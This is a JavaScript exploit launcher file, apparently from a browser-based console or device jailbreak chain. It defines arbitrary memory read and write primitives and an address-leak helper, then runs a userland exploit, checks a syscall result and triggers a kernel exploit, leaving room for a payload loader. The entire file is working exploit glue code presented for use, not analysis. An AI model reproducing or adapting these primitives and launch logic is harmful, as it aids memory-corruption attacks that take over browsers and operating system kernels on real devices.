kexploit-launcher.js

window.p = {
    write8: function(addr, value) {
        if(value instanceof int64)
        {
            var q = [0, 0, 0, 0, 0, 0, 0, 0];
            var q2 = value.low;
            for(var i = 0; i < 4; i++)
            {
                q[i] = q2 & 255;
                q2 >>= 8;
            }
            q2 = value.hi;
            for(var i = 4; i < 8; i++)
            {
                q[i] = q2 & 255;
                q2 >>= 8;
            }
            write_mem(addr.hi*0x100000000+addr.low, q);
        }
        else
            write_ptr_at(addr.hi*0x100000000+addr.low, value);
    },
    write4: function(addr, value) {
        if(value instanceof int64)
            value = value.low;
        var q = [0, 0, 0, 0];
        for(var i = 0; i < 4; i++)
        {
            q[i] = value & 255;
            value >>= 8;
        }
        write_mem(addr.hi*0x100000000+addr.low, q);
    },
    write2: function(addr, value) {
        if(value instanceof int64)
            value = value.low;
        write_mem(addr.hi*0x100000000+addr.low, [value&255, (value>>8)&255]);
    },
    write1: function(addr, value) {
        if(value instanceof int64)
            value = value.low;
        write_mem(addr.hi*0x100000000+addr.low, [value&255]);
    },
    read8: function(addr) {
        var q = read_mem(addr.hi*0x100000000+addr.low, 8);
        var low = 0;
        for(var i = 3; i >= 0; i--)
            low = 256 * low + q[i];
        var high = 0;
        for(var i = 7; i >= 4; i--)
            high = 256 * high + q[i];
        return new int64(low, high);
    },
    read4: function(addr) {
        var q = read_mem(addr.hi*0x100000000+addr.low, 4);
        var ans = 0;
        for(var i = 3; i >= 0; i--)
            ans = 256 * ans + q[i];
        return ans;
    },
    read2: function(addr) {
        var ans = read_mem(addr.hi*0x100000000+addr.low, 2);
        return ans[1] * 256 + ans[0];
    },
    read1: function(addr) {
        return read_mem(addr.hi*0x100000000+addr.low, 1)[0];
    },
    leakval: function(obj) {
        var ans = addrof(obj);
        return new int64(ans % 0x100000000, (ans - ans % 0x100000000) / 0x100000000);
    }
};

try
{
    userland();
    if(chain.syscall(23, 0).low != 0x0)
        kernel();
    //supply our own payload loader
}
catch(e)
{
    alert(e+'\n'+e.stack);
}